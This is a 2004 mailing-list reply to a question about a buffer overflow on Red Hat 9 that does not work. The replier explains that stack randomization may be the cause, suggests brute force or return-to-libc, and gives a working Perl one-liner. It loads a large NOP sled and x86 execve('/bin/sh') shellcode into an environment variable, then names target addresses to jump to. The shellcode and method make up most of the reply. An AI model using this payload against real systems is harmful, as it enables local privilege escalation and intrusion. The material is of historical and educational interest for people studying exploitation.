Re: Buffer Overflow Help

[Harry de Grote <rik.bobbaers () cc kuleuven ac be>]

Op Tuesday 09 November 2004 04:09, eip () tampabay rr com sgreifde:
<snip>
> I am running GCC version 3.2.2 20030222 (Red Hat Linux 3.2.2-5) on a Redhat
> 9 box kernel 2.4.20-31.9. Am I doing something wrong?

no, you don't

but... RH does randomize the stack a little iirc

so, my way of doing stuff then, is just brute force it! :)
(you could also return tu libc or whatever)

best way to do it (i think) is : put your shellcode in the env...

export SHELLCODE=`perl -e '{print "\x90"x65000 . 
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`

that should give you some breathing space for where to jump to...

shellcode starts (on my box at 0xbfff0027, so everything from there to 
0xbffffe00 sould do fine...
-- 
harry
aka Rik Bobbaers

K.U.Leuven - LUDIT             -=- Tel: +32 485 52 71 50
Rik.Bobbaers () cc kuleuven ac be -=- http://harry.ulyssis.org

"\x41\x20\x63\x6f\x6d\x70\x75\x74\x65\x72\x20\x77\x69\x74\x68\x6f\x75\x74\x20"
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x69\x73\x20\x6c\x69\x6b\x65\x20\x61\x20\x66"
"\x69\x73\x68\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x61\x20\x62\x69\x63\x79\x63"
"\x6c\x65\x0a\x00"